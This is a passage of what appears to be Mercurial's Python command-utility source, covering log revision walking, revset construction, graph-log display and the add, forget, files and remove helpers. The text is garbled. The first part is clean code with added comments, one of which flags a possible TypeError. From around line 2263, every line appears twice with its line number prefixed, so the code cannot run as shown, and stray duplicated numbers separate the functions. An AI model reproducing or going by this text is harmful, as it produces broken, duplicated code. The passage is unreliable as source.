        # We have to read the changelog to match filenames against
        # changed files

        if follow:
            raise error.Abort(_('can only follow copies/renames for explicit '
                                'filenames'))

        # The slow path checks files modified in every changeset.
        # This is really slow on large repos, so compute the set lazily.
        class lazywantedset(object):
            def __init__(self):
                self.set = set()
                self.revs = set(revs)

            # No need to worry about locality here because it will be accessed
            # in the same order as the increasing window below.
            def __contains__(self, value):
                if value in self.set:
                    return True
                elif not value in self.revs:
                    return False
                else:
                    # evaluate each candidate rev at most once
                    self.revs.discard(value)
                    ctx = change(value)
                    # NB: py2 filter() returns a list, so truthiness works
                    matches = filter(match, ctx.files())
                    if matches:
                        fncache[value] = matches
                        self.set.add(value)
                        return True
                    return False

            def discard(self, value):
                self.revs.discard(value)
                self.set.discard(value)

        wanted = lazywantedset()

    # it might be worthwhile to do this in the iterator if the rev range
    # is descending and the prune args are all within that range
    for rev in opts.get('prune', ()):
        rev = repo[rev].rev()
        ff = _followfilter(repo)
        stop = min(revs[0], revs[-1])
        for x in xrange(rev, stop - 1, -1):
            if ff.match(x):
                # NOTE(review): 'wanted - [x]' requires wanted's __sub__ to
                # accept a list; a plain set() or the lazywantedset above
                # would raise TypeError here — confirm which types reach
                # this branch (smartsets appear to be the intended case)
                wanted = wanted - [x]

    # Now that wanted is correctly initialized, we can iterate over the
    # revision range, yielding only revisions in wanted.
    def iterate():
        if follow and match.always():
            ff = _followfilter(repo, onlyfirst=opts.get('follow_first'))
            def want(rev):
                return ff.match(rev) and rev in wanted
        else:
            def want(rev):
                return rev in wanted

        it = iter(revs)
        stopiteration = False
        for windowsize in increasingwindows():
            nrevs = []
            # gather up to windowsize wanted revs from the iterator
            for i in xrange(windowsize):
                rev = next(it, None)
                if rev is None:
                    stopiteration = True
                    break
                elif want(rev):
                    nrevs.append(rev)
            # prepare() is called in forward (ascending) order ...
            for rev in sorted(nrevs):
                fns = fncache.get(rev)
                ctx = change(rev)
                if not fns:
                    def fns_generator():
                        for f in ctx.files():
                            if match(f):
                                yield f
                    fns = fns_generator()
                prepare(ctx, fns)
            # ... but contexts are yielded in the window's own order
            for rev in nrevs:
                yield change(rev)

            if stopiteration:
                break

    return iterate()
2234
2234
def _makefollowlogfilematcher(repo, files, followfirst):
    """Build a per-rev file matcher for --patch/--stat with --follow.

    Returns a callable rev -> matcher selecting, for each revision, the
    ancestor names of the followed files at that revision.
    """
    # When displaying a revision with --patch --follow FILE, we have
    # to know which file of the revision must be diffed. With
    # --follow, we want the names of the ancestors of FILE in the
    # revision, stored in "fcache". "fcache" is populated by
    # reproducing the graph traversal already done by --follow revset
    # and relating revs to file names (which is not "correct" but
    # good enough).
    fcache = {}
    # one-element list used as a mutable flag cell (py2 has no nonlocal)
    fcacheready = [False]
    pctx = repo['.']

    def populate():
        # map each rev to the set of ancestor paths of the followed files
        for fn in files:
            fctx = pctx[fn]
            fcache.setdefault(fctx.introrev(), set()).add(fctx.path())
            for c in fctx.ancestors(followfirst=followfirst):
                fcache.setdefault(c.rev(), set()).add(c.path())

    def filematcher(rev):
        if not fcacheready[0]:
            # Lazy initialization
            fcacheready[0] = True
            populate()
        return scmutil.matchfiles(repo, fcache.get(rev, []))

    return filematcher
2262
2262
2263 def _makenofollowlogfilematcher(repo, pats, opts):
2263 def _makenofollowlogfilematcher(repo, pats, opts):
2264 '''hook for extensions to override the filematcher for non-follow cases'''
2264 '''hook for extensions to override the filematcher for non-follow cases'''
2265 return None
2265 return None
2266
2266
def _makelogrevset(repo, pats, opts, revs):
    """Return (expr, filematcher) where expr is a revset string built
    from log options and file patterns or None. If --stat or --patch
    are not passed filematcher is None. Otherwise it is a callable
    taking a revision number and returning a match objects filtering
    the files to be detailed when displaying the revision.
    """
    # map option name -> (revset template, join operator for list values)
    opt2revset = {
        'no_merges': ('not merge()', None),
        'only_merges': ('merge()', None),
        '_ancestors': ('ancestors(%(val)s)', None),
        '_fancestors': ('_firstancestors(%(val)s)', None),
        '_descendants': ('descendants(%(val)s)', None),
        '_fdescendants': ('_firstdescendants(%(val)s)', None),
        '_matchfiles': ('_matchfiles(%(val)s)', None),
        'date': ('date(%(val)r)', None),
        'branch': ('branch(%(val)r)', ' or '),
        '_patslog': ('filelog(%(val)r)', ' or '),
        '_patsfollow': ('follow(%(val)r)', ' or '),
        '_patsfollowfirst': ('_followfirst(%(val)r)', ' or '),
        'keyword': ('keyword(%(val)r)', ' or '),
        'prune': ('not (%(val)r or ancestors(%(val)r))', ' and '),
        'user': ('user(%(val)r)', ' or '),
    }

    # copy: internal pseudo-options (leading underscore) are added below
    opts = dict(opts)
    # follow or not follow?
    follow = opts.get('follow') or opts.get('follow_first')
    if opts.get('follow_first'):
        followfirst = 1
    else:
        followfirst = 0
    # --follow with FILE behavior depends on revs...
    it = iter(revs)
    startrev = next(it)
    # ascending rev order means we follow descendants rather than ancestors
    followdescendants = startrev < next(it, startrev)

    # branch and only_branch are really aliases and must be handled at
    # the same time
    opts['branch'] = opts.get('branch', []) + opts.get('only_branch', [])
    opts['branch'] = [repo.lookupbranch(b) for b in opts['branch']]
    # pats/include/exclude are passed to match.match() directly in
    # _matchfiles() revset but walkchangerevs() builds its matcher with
    # scmutil.match(). The difference is input pats are globbed on
    # platforms without shell expansion (windows).
    wctx = repo[None]
    match, pats = scmutil.matchandpats(wctx, pats, opts)
    slowpath = match.anypats() or ((match.isexact() or match.prefix()) and
                                   opts.get('removed'))
    if not slowpath:
        for f in match.files():
            if follow and f not in wctx:
                # If the file exists, it may be a directory, so let it
                # take the slow path.
                if os.path.exists(repo.wjoin(f)):
                    slowpath = True
                    continue
                else:
                    raise error.Abort(_('cannot follow file not in parent '
                                        'revision: "%s"') % f)
            filelog = repo.file(f)
            if not filelog:
                # A zero count may be a directory or deleted file, so
                # try to find matching entries on the slow path.
                if follow:
                    raise error.Abort(
                        _('cannot follow nonexistent file: "%s"') % f)
                slowpath = True

        # We decided to fall back to the slowpath because at least one
        # of the paths was not a file. Check to see if at least one of them
        # existed in history - in that case, we'll continue down the
        # slowpath; otherwise, we can turn off the slowpath
        if slowpath:
            for path in match.files():
                if path == '.' or path in repo.store:
                    break
            else:
                slowpath = False

    fpats = ('_patsfollow', '_patsfollowfirst')
    fnopats = (('_ancestors', '_fancestors'),
               ('_descendants', '_fdescendants'))
    if slowpath:
        # See walkchangerevs() slow path.
        #
        # pats/include/exclude cannot be represented as separate
        # revset expressions as their filtering logic applies at file
        # level. For instance "-I a -X a" matches a revision touching
        # "a" and "b" while "file(a) and not file(b)" does
        # not. Besides, filesets are evaluated against the working
        # directory.
        matchargs = ['r:', 'd:relpath']
        for p in pats:
            matchargs.append('p:' + p)
        for p in opts.get('include', []):
            matchargs.append('i:' + p)
        for p in opts.get('exclude', []):
            matchargs.append('x:' + p)
        matchargs = ','.join(('%r' % p) for p in matchargs)
        opts['_matchfiles'] = matchargs
        if follow:
            opts[fnopats[0][followfirst]] = '.'
    else:
        if follow:
            if pats:
                # follow() revset interprets its file argument as a
                # manifest entry, so use match.files(), not pats.
                opts[fpats[followfirst]] = list(match.files())
            else:
                op = fnopats[followdescendants][followfirst]
                opts[op] = 'rev(%d)' % startrev
        else:
            opts['_patslog'] = list(pats)

    filematcher = None
    if opts.get('patch') or opts.get('stat'):
        # When following files, track renames via a special matcher.
        # If we're forced to take the slowpath it means we're following
        # at least one pattern/directory, so don't bother with rename tracking.
        if follow and not match.always() and not slowpath:
            # _makefollowlogfilematcher expects its files argument to be
            # relative to the repo root, so use match.files(), not pats.
            filematcher = _makefollowlogfilematcher(repo, match.files(),
                                                    followfirst)
        else:
            filematcher = _makenofollowlogfilematcher(repo, pats, opts)
            if filematcher is None:
                filematcher = lambda rev: match

    # translate the accumulated options into a single 'and'-joined revset
    expr = []
    for op, val in sorted(opts.iteritems()):
        if not val:
            continue
        if op not in opt2revset:
            continue
        revop, andor = opt2revset[op]
        if '%(val)' not in revop:
            expr.append(revop)
        else:
            if not isinstance(val, list):
                e = revop % {'val': val}
            else:
                # list-valued options are joined with their own operator
                e = '(' + andor.join((revop % {'val': v}) for v in val) + ')'
            expr.append(e)

    if expr:
        expr = '(' + ' and '.join(expr) + ')'
    else:
        expr = None
    return expr, filematcher
2418
2418
def _logrevs(repo, opts):
    """Resolve the default revision set for log-style commands.

    Returns a smartset: the user's --rev range when given, otherwise
    'reverse(:.)' for --follow, or all revisions newest-first.
    """
    # Default --rev value depends on --follow but --follow behavior
    # depends on revisions resolved from --rev...
    follow = opts.get('follow') or opts.get('follow_first')
    if opts.get('rev'):
        revs = scmutil.revrange(repo, opts['rev'])
    elif follow and repo.dirstate.p1() == nullid:
        # following from an unborn working-directory parent: nothing to show
        revs = smartset.baseset()
    elif follow:
        revs = repo.revs('reverse(:.)')
    else:
        revs = smartset.spanset(repo)
        revs.reverse()
    return revs
2433
2433
2434 def getgraphlogrevs(repo, pats, opts):
2434 def getgraphlogrevs(repo, pats, opts):
2435 """Return (revs, expr, filematcher) where revs is an iterable of
2435 """Return (revs, expr, filematcher) where revs is an iterable of
2436 revision numbers, expr is a revset string built from log options
2436 revision numbers, expr is a revset string built from log options
2437 and file patterns or None, and used to filter 'revs'. If --stat or
2437 and file patterns or None, and used to filter 'revs'. If --stat or
2438 --patch are not passed filematcher is None. Otherwise it is a
2438 --patch are not passed filematcher is None. Otherwise it is a
2439 callable taking a revision number and returning a match objects
2439 callable taking a revision number and returning a match objects
2440 filtering the files to be detailed when displaying the revision.
2440 filtering the files to be detailed when displaying the revision.
2441 """
2441 """
2442 limit = loglimit(opts)
2442 limit = loglimit(opts)
2443 revs = _logrevs(repo, opts)
2443 revs = _logrevs(repo, opts)
2444 if not revs:
2444 if not revs:
2445 return smartset.baseset(), None, None
2445 return smartset.baseset(), None, None
2446 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2446 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2447 if opts.get('rev'):
2447 if opts.get('rev'):
2448 # User-specified revs might be unsorted, but don't sort before
2448 # User-specified revs might be unsorted, but don't sort before
2449 # _makelogrevset because it might depend on the order of revs
2449 # _makelogrevset because it might depend on the order of revs
2450 if not (revs.isdescending() or revs.istopo()):
2450 if not (revs.isdescending() or revs.istopo()):
2451 revs.sort(reverse=True)
2451 revs.sort(reverse=True)
2452 if expr:
2452 if expr:
2453 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2453 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2454 revs = matcher(repo, revs)
2454 revs = matcher(repo, revs)
2455 if limit is not None:
2455 if limit is not None:
2456 limitedrevs = []
2456 limitedrevs = []
2457 for idx, rev in enumerate(revs):
2457 for idx, rev in enumerate(revs):
2458 if idx >= limit:
2458 if idx >= limit:
2459 break
2459 break
2460 limitedrevs.append(rev)
2460 limitedrevs.append(rev)
2461 revs = smartset.baseset(limitedrevs)
2461 revs = smartset.baseset(limitedrevs)
2462
2462
2463 return revs, expr, filematcher
2463 return revs, expr, filematcher
2464
2464
2465 def getlogrevs(repo, pats, opts):
2465 def getlogrevs(repo, pats, opts):
2466 """Return (revs, expr, filematcher) where revs is an iterable of
2466 """Return (revs, expr, filematcher) where revs is an iterable of
2467 revision numbers, expr is a revset string built from log options
2467 revision numbers, expr is a revset string built from log options
2468 and file patterns or None, and used to filter 'revs'. If --stat or
2468 and file patterns or None, and used to filter 'revs'. If --stat or
2469 --patch are not passed filematcher is None. Otherwise it is a
2469 --patch are not passed filematcher is None. Otherwise it is a
2470 callable taking a revision number and returning a match objects
2470 callable taking a revision number and returning a match objects
2471 filtering the files to be detailed when displaying the revision.
2471 filtering the files to be detailed when displaying the revision.
2472 """
2472 """
2473 limit = loglimit(opts)
2473 limit = loglimit(opts)
2474 revs = _logrevs(repo, opts)
2474 revs = _logrevs(repo, opts)
2475 if not revs:
2475 if not revs:
2476 return smartset.baseset([]), None, None
2476 return smartset.baseset([]), None, None
2477 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2477 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2478 if expr:
2478 if expr:
2479 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2479 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2480 revs = matcher(repo, revs)
2480 revs = matcher(repo, revs)
2481 if limit is not None:
2481 if limit is not None:
2482 limitedrevs = []
2482 limitedrevs = []
2483 for idx, r in enumerate(revs):
2483 for idx, r in enumerate(revs):
2484 if limit <= idx:
2484 if limit <= idx:
2485 break
2485 break
2486 limitedrevs.append(r)
2486 limitedrevs.append(r)
2487 revs = smartset.baseset(limitedrevs)
2487 revs = smartset.baseset(limitedrevs)
2488
2488
2489 return revs, expr, filematcher
2489 return revs, expr, filematcher
2490
2490
2491 def _graphnodeformatter(ui, displayer):
2491 def _graphnodeformatter(ui, displayer):
2492 spec = ui.config('ui', 'graphnodetemplate')
2492 spec = ui.config('ui', 'graphnodetemplate')
2493 if not spec:
2493 if not spec:
2494 return templatekw.showgraphnode # fast path for "{graphnode}"
2494 return templatekw.showgraphnode # fast path for "{graphnode}"
2495
2495
2496 spec = templater.unquotestring(spec)
2496 spec = templater.unquotestring(spec)
2497 templ = formatter.maketemplater(ui, spec)
2497 templ = formatter.maketemplater(ui, spec)
2498 cache = {}
2498 cache = {}
2499 if isinstance(displayer, changeset_templater):
2499 if isinstance(displayer, changeset_templater):
2500 cache = displayer.cache # reuse cache of slow templates
2500 cache = displayer.cache # reuse cache of slow templates
2501 props = templatekw.keywords.copy()
2501 props = templatekw.keywords.copy()
2502 props['templ'] = templ
2502 props['templ'] = templ
2503 props['cache'] = cache
2503 props['cache'] = cache
2504 def formatnode(repo, ctx):
2504 def formatnode(repo, ctx):
2505 props['ctx'] = ctx
2505 props['ctx'] = ctx
2506 props['repo'] = repo
2506 props['repo'] = repo
2507 props['ui'] = repo.ui
2507 props['ui'] = repo.ui
2508 props['revcache'] = {}
2508 props['revcache'] = {}
2509 return templ.render(props)
2509 return templ.render(props)
2510 return formatnode
2510 return formatnode
2511
2511
2512 def displaygraph(ui, repo, dag, displayer, edgefn, getrenamed=None,
2512 def displaygraph(ui, repo, dag, displayer, edgefn, getrenamed=None,
2513 filematcher=None):
2513 filematcher=None):
2514 formatnode = _graphnodeformatter(ui, displayer)
2514 formatnode = _graphnodeformatter(ui, displayer)
2515 state = graphmod.asciistate()
2515 state = graphmod.asciistate()
2516 styles = state['styles']
2516 styles = state['styles']
2517
2517
2518 # only set graph styling if HGPLAIN is not set.
2518 # only set graph styling if HGPLAIN is not set.
2519 if ui.plain('graph'):
2519 if ui.plain('graph'):
2520 # set all edge styles to |, the default pre-3.8 behaviour
2520 # set all edge styles to |, the default pre-3.8 behaviour
2521 styles.update(dict.fromkeys(styles, '|'))
2521 styles.update(dict.fromkeys(styles, '|'))
2522 else:
2522 else:
2523 edgetypes = {
2523 edgetypes = {
2524 'parent': graphmod.PARENT,
2524 'parent': graphmod.PARENT,
2525 'grandparent': graphmod.GRANDPARENT,
2525 'grandparent': graphmod.GRANDPARENT,
2526 'missing': graphmod.MISSINGPARENT
2526 'missing': graphmod.MISSINGPARENT
2527 }
2527 }
2528 for name, key in edgetypes.items():
2528 for name, key in edgetypes.items():
2529 # experimental config: experimental.graphstyle.*
2529 # experimental config: experimental.graphstyle.*
2530 styles[key] = ui.config('experimental', 'graphstyle.%s' % name,
2530 styles[key] = ui.config('experimental', 'graphstyle.%s' % name,
2531 styles[key])
2531 styles[key])
2532 if not styles[key]:
2532 if not styles[key]:
2533 styles[key] = None
2533 styles[key] = None
2534
2534
2535 # experimental config: experimental.graphshorten
2535 # experimental config: experimental.graphshorten
2536 state['graphshorten'] = ui.configbool('experimental', 'graphshorten')
2536 state['graphshorten'] = ui.configbool('experimental', 'graphshorten')
2537
2537
2538 for rev, type, ctx, parents in dag:
2538 for rev, type, ctx, parents in dag:
2539 char = formatnode(repo, ctx)
2539 char = formatnode(repo, ctx)
2540 copies = None
2540 copies = None
2541 if getrenamed and ctx.rev():
2541 if getrenamed and ctx.rev():
2542 copies = []
2542 copies = []
2543 for fn in ctx.files():
2543 for fn in ctx.files():
2544 rename = getrenamed(fn, ctx.rev())
2544 rename = getrenamed(fn, ctx.rev())
2545 if rename:
2545 if rename:
2546 copies.append((fn, rename[0]))
2546 copies.append((fn, rename[0]))
2547 revmatchfn = None
2547 revmatchfn = None
2548 if filematcher is not None:
2548 if filematcher is not None:
2549 revmatchfn = filematcher(ctx.rev())
2549 revmatchfn = filematcher(ctx.rev())
2550 displayer.show(ctx, copies=copies, matchfn=revmatchfn)
2550 displayer.show(ctx, copies=copies, matchfn=revmatchfn)
2551 lines = displayer.hunk.pop(rev).split('\n')
2551 lines = displayer.hunk.pop(rev).split('\n')
2552 if not lines[-1]:
2552 if not lines[-1]:
2553 del lines[-1]
2553 del lines[-1]
2554 displayer.flush(ctx)
2554 displayer.flush(ctx)
2555 edges = edgefn(type, char, lines, state, rev, parents)
2555 edges = edgefn(type, char, lines, state, rev, parents)
2556 for type, char, lines, coldata in edges:
2556 for type, char, lines, coldata in edges:
2557 graphmod.ascii(ui, state, type, char, lines, coldata)
2557 graphmod.ascii(ui, state, type, char, lines, coldata)
2558 displayer.close()
2558 displayer.close()
2559
2559
2560 def graphlog(ui, repo, pats, opts):
2560 def graphlog(ui, repo, pats, opts):
2561 # Parameters are identical to log command ones
2561 # Parameters are identical to log command ones
2562 revs, expr, filematcher = getgraphlogrevs(repo, pats, opts)
2562 revs, expr, filematcher = getgraphlogrevs(repo, pats, opts)
2563 revdag = graphmod.dagwalker(repo, revs)
2563 revdag = graphmod.dagwalker(repo, revs)
2564
2564
2565 getrenamed = None
2565 getrenamed = None
2566 if opts.get('copies'):
2566 if opts.get('copies'):
2567 endrev = None
2567 endrev = None
2568 if opts.get('rev'):
2568 if opts.get('rev'):
2569 endrev = scmutil.revrange(repo, opts.get('rev')).max() + 1
2569 endrev = scmutil.revrange(repo, opts.get('rev')).max() + 1
2570 getrenamed = templatekw.getrenamedfn(repo, endrev=endrev)
2570 getrenamed = templatekw.getrenamedfn(repo, endrev=endrev)
2571
2571
2572 ui.pager('log')
2572 ui.pager('log')
2573 displayer = show_changeset(ui, repo, opts, buffered=True)
2573 displayer = show_changeset(ui, repo, opts, buffered=True)
2574 displaygraph(ui, repo, revdag, displayer, graphmod.asciiedges, getrenamed,
2574 displaygraph(ui, repo, revdag, displayer, graphmod.asciiedges, getrenamed,
2575 filematcher)
2575 filematcher)
2576
2576
2577 def checkunsupportedgraphflags(pats, opts):
2577 def checkunsupportedgraphflags(pats, opts):
2578 for op in ["newest_first"]:
2578 for op in ["newest_first"]:
2579 if op in opts and opts[op]:
2579 if op in opts and opts[op]:
2580 raise error.Abort(_("-G/--graph option is incompatible with --%s")
2580 raise error.Abort(_("-G/--graph option is incompatible with --%s")
2581 % op.replace("_", "-"))
2581 % op.replace("_", "-"))
2582
2582
2583 def graphrevs(repo, nodes, opts):
2583 def graphrevs(repo, nodes, opts):
2584 limit = loglimit(opts)
2584 limit = loglimit(opts)
2585 nodes.reverse()
2585 nodes.reverse()
2586 if limit is not None:
2586 if limit is not None:
2587 nodes = nodes[:limit]
2587 nodes = nodes[:limit]
2588 return graphmod.nodes(repo, nodes)
2588 return graphmod.nodes(repo, nodes)
2589
2589
2590 def add(ui, repo, match, prefix, explicitonly, **opts):
2590 def add(ui, repo, match, prefix, explicitonly, **opts):
2591 join = lambda f: os.path.join(prefix, f)
2591 join = lambda f: os.path.join(prefix, f)
2592 bad = []
2592 bad = []
2593
2593
2594 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2594 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2595 names = []
2595 names = []
2596 wctx = repo[None]
2596 wctx = repo[None]
2597 cca = None
2597 cca = None
2598 abort, warn = scmutil.checkportabilityalert(ui)
2598 abort, warn = scmutil.checkportabilityalert(ui)
2599 if abort or warn:
2599 if abort or warn:
2600 cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)
2600 cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)
2601
2601
2602 badmatch = matchmod.badmatch(match, badfn)
2602 badmatch = matchmod.badmatch(match, badfn)
2603 dirstate = repo.dirstate
2603 dirstate = repo.dirstate
2604 # We don't want to just call wctx.walk here, since it would return a lot of
2604 # We don't want to just call wctx.walk here, since it would return a lot of
2605 # clean files, which we aren't interested in and takes time.
2605 # clean files, which we aren't interested in and takes time.
2606 for f in sorted(dirstate.walk(badmatch, sorted(wctx.substate),
2606 for f in sorted(dirstate.walk(badmatch, sorted(wctx.substate),
2607 True, False, full=False)):
2607 True, False, full=False)):
2608 exact = match.exact(f)
2608 exact = match.exact(f)
2609 if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
2609 if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
2610 if cca:
2610 if cca:
2611 cca(f)
2611 cca(f)
2612 names.append(f)
2612 names.append(f)
2613 if ui.verbose or not exact:
2613 if ui.verbose or not exact:
2614 ui.status(_('adding %s\n') % match.rel(f))
2614 ui.status(_('adding %s\n') % match.rel(f))
2615
2615
2616 for subpath in sorted(wctx.substate):
2616 for subpath in sorted(wctx.substate):
2617 sub = wctx.sub(subpath)
2617 sub = wctx.sub(subpath)
2618 try:
2618 try:
2619 submatch = matchmod.subdirmatcher(subpath, match)
2619 submatch = matchmod.subdirmatcher(subpath, match)
2620 if opts.get(r'subrepos'):
2620 if opts.get(r'subrepos'):
2621 bad.extend(sub.add(ui, submatch, prefix, False, **opts))
2621 bad.extend(sub.add(ui, submatch, prefix, False, **opts))
2622 else:
2622 else:
2623 bad.extend(sub.add(ui, submatch, prefix, True, **opts))
2623 bad.extend(sub.add(ui, submatch, prefix, True, **opts))
2624 except error.LookupError:
2624 except error.LookupError:
2625 ui.status(_("skipping missing subrepository: %s\n")
2625 ui.status(_("skipping missing subrepository: %s\n")
2626 % join(subpath))
2626 % join(subpath))
2627
2627
2628 if not opts.get(r'dry_run'):
2628 if not opts.get(r'dry_run'):
2629 rejected = wctx.add(names, prefix)
2629 rejected = wctx.add(names, prefix)
2630 bad.extend(f for f in rejected if f in match.files())
2630 bad.extend(f for f in rejected if f in match.files())
2631 return bad
2631 return bad
2632
2632
2633 def addwebdirpath(repo, serverpath, webconf):
2633 def addwebdirpath(repo, serverpath, webconf):
2634 webconf[serverpath] = repo.root
2634 webconf[serverpath] = repo.root
2635 repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))
2635 repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))
2636
2636
2637 for r in repo.revs('filelog("path:.hgsub")'):
2637 for r in repo.revs('filelog("path:.hgsub")'):
2638 ctx = repo[r]
2638 ctx = repo[r]
2639 for subpath in ctx.substate:
2639 for subpath in ctx.substate:
2640 ctx.sub(subpath).addwebdirpath(serverpath, webconf)
2640 ctx.sub(subpath).addwebdirpath(serverpath, webconf)
2641
2641
2642 def forget(ui, repo, match, prefix, explicitonly):
2642 def forget(ui, repo, match, prefix, explicitonly):
2643 join = lambda f: os.path.join(prefix, f)
2643 join = lambda f: os.path.join(prefix, f)
2644 bad = []
2644 bad = []
2645 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2645 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2646 wctx = repo[None]
2646 wctx = repo[None]
2647 forgot = []
2647 forgot = []
2648
2648
2649 s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
2649 s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
2650 forget = sorted(s.modified + s.added + s.deleted + s.clean)
2650 forget = sorted(s.modified + s.added + s.deleted + s.clean)
2651 if explicitonly:
2651 if explicitonly:
2652 forget = [f for f in forget if match.exact(f)]
2652 forget = [f for f in forget if match.exact(f)]
2653
2653
2654 for subpath in sorted(wctx.substate):
2654 for subpath in sorted(wctx.substate):
2655 sub = wctx.sub(subpath)
2655 sub = wctx.sub(subpath)
2656 try:
2656 try:
2657 submatch = matchmod.subdirmatcher(subpath, match)
2657 submatch = matchmod.subdirmatcher(subpath, match)
2658 subbad, subforgot = sub.forget(submatch, prefix)
2658 subbad, subforgot = sub.forget(submatch, prefix)
2659 bad.extend([subpath + '/' + f for f in subbad])
2659 bad.extend([subpath + '/' + f for f in subbad])
2660 forgot.extend([subpath + '/' + f for f in subforgot])
2660 forgot.extend([subpath + '/' + f for f in subforgot])
2661 except error.LookupError:
2661 except error.LookupError:
2662 ui.status(_("skipping missing subrepository: %s\n")
2662 ui.status(_("skipping missing subrepository: %s\n")
2663 % join(subpath))
2663 % join(subpath))
2664
2664
2665 if not explicitonly:
2665 if not explicitonly:
2666 for f in match.files():
2666 for f in match.files():
2667 if f not in repo.dirstate and not repo.wvfs.isdir(f):
2667 if f not in repo.dirstate and not repo.wvfs.isdir(f):
2668 if f not in forgot:
2668 if f not in forgot:
2669 if repo.wvfs.exists(f):
2669 if repo.wvfs.exists(f):
2670 # Don't complain if the exact case match wasn't given.
2670 # Don't complain if the exact case match wasn't given.
2671 # But don't do this until after checking 'forgot', so
2671 # But don't do this until after checking 'forgot', so
2672 # that subrepo files aren't normalized, and this op is
2672 # that subrepo files aren't normalized, and this op is
2673 # purely from data cached by the status walk above.
2673 # purely from data cached by the status walk above.
2674 if repo.dirstate.normalize(f) in repo.dirstate:
2674 if repo.dirstate.normalize(f) in repo.dirstate:
2675 continue
2675 continue
2676 ui.warn(_('not removing %s: '
2676 ui.warn(_('not removing %s: '
2677 'file is already untracked\n')
2677 'file is already untracked\n')
2678 % match.rel(f))
2678 % match.rel(f))
2679 bad.append(f)
2679 bad.append(f)
2680
2680
2681 for f in forget:
2681 for f in forget:
2682 if ui.verbose or not match.exact(f):
2682 if ui.verbose or not match.exact(f):
2683 ui.status(_('removing %s\n') % match.rel(f))
2683 ui.status(_('removing %s\n') % match.rel(f))
2684
2684
2685 rejected = wctx.forget(forget, prefix)
2685 rejected = wctx.forget(forget, prefix)
2686 bad.extend(f for f in rejected if f in match.files())
2686 bad.extend(f for f in rejected if f in match.files())
2687 forgot.extend(f for f in forget if f not in rejected)
2687 forgot.extend(f for f in forget if f not in rejected)
2688 return bad, forgot
2688 return bad, forgot
2689
2689
2690 def files(ui, ctx, m, fm, fmt, subrepos):
2690 def files(ui, ctx, m, fm, fmt, subrepos):
2691 rev = ctx.rev()
2691 rev = ctx.rev()
2692 ret = 1
2692 ret = 1
2693 ds = ctx.repo().dirstate
2693 ds = ctx.repo().dirstate
2694
2694
2695 for f in ctx.matches(m):
2695 for f in ctx.matches(m):
2696 if rev is None and ds[f] == 'r':
2696 if rev is None and ds[f] == 'r':
2697 continue
2697 continue
2698 fm.startitem()
2698 fm.startitem()
2699 if ui.verbose:
2699 if ui.verbose:
2700 fc = ctx[f]
2700 fc = ctx[f]
2701 fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
2701 fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
2702 fm.data(abspath=f)
2702 fm.data(abspath=f)
2703 fm.write('path', fmt, m.rel(f))
2703 fm.write('path', fmt, m.rel(f))
2704 ret = 0
2704 ret = 0
2705
2705
2706 for subpath in sorted(ctx.substate):
2706 for subpath in sorted(ctx.substate):
2707 submatch = matchmod.subdirmatcher(subpath, m)
2707 submatch = matchmod.subdirmatcher(subpath, m)
2708 if (subrepos or m.exact(subpath) or any(submatch.files())):
2708 if (subrepos or m.exact(subpath) or any(submatch.files())):
2709 sub = ctx.sub(subpath)
2709 sub = ctx.sub(subpath)
2710 try:
2710 try:
2711 recurse = m.exact(subpath) or subrepos
2711 recurse = m.exact(subpath) or subrepos
2712 if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
2712 if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
2713 ret = 0
2713 ret = 0
2714 except error.LookupError:
2714 except error.LookupError:
2715 ui.status(_("skipping missing subrepository: %s\n")
2715 ui.status(_("skipping missing subrepository: %s\n")
2716 % m.abs(subpath))
2716 % m.abs(subpath))
2717
2717
2718 return ret
2718 return ret
2719
2719
2720 def remove(ui, repo, m, prefix, after, force, subrepos, warnings=None):
2720 def remove(ui, repo, m, prefix, after, force, subrepos, warnings=None):
2721 join = lambda f: os.path.join(prefix, f)
2721 join = lambda f: os.path.join(prefix, f)
2722 ret = 0
2722 ret = 0
2723 s = repo.status(match=m, clean=True)
2723 s = repo.status(match=m, clean=True)
2724 modified, added, deleted, clean = s[0], s[1], s[3], s[6]
2724 modified, added, deleted, clean = s[0], s[1], s[3], s[6]
2725
2725
2726 wctx = repo[None]
2726 wctx = repo[None]
2727
2727
2728 if warnings is None:
2728 if warnings is None:
2729 warnings = []
2729 warnings = []
2730 warn = True
2730 warn = True
2731 else:
2731 else:
2732 warn = False
2732 warn = False
2733
2733
2734 subs = sorted(wctx.substate)
2734 subs = sorted(wctx.substate)
2735 total = len(subs)
2735 total = len(subs)
2736 count = 0
2736 count = 0
2737 for subpath in subs:
2737 for subpath in subs:
2738 count += 1
2738 count += 1
2739 submatch = matchmod.subdirmatcher(subpath, m)
2739 submatch = matchmod.subdirmatcher(subpath, m)
2740 if subrepos or m.exact(subpath) or any(submatch.files()):
2740 if subrepos or m.exact(subpath) or any(submatch.files()):
2741 ui.progress(_('searching'), count, total=total, unit=_('subrepos'))
2741 ui.progress(_('searching'), count, total=total, unit=_('subrepos'))
2742 sub = wctx.sub(subpath)
2742 sub = wctx.sub(subpath)
2743 try:
2743 try:
2744 if sub.removefiles(submatch, prefix, after, force, subrepos,
2744 if sub.removefiles(submatch, prefix, after, force, subrepos,
2745 warnings):
2745 warnings):
2746 ret = 1
2746 ret = 1
2747 except error.LookupError:
2747 except error.LookupError:
2748 warnings.append(_("skipping missing subrepository: %s\n")
2748 warnings.append(_("skipping missing subrepository: %s\n")
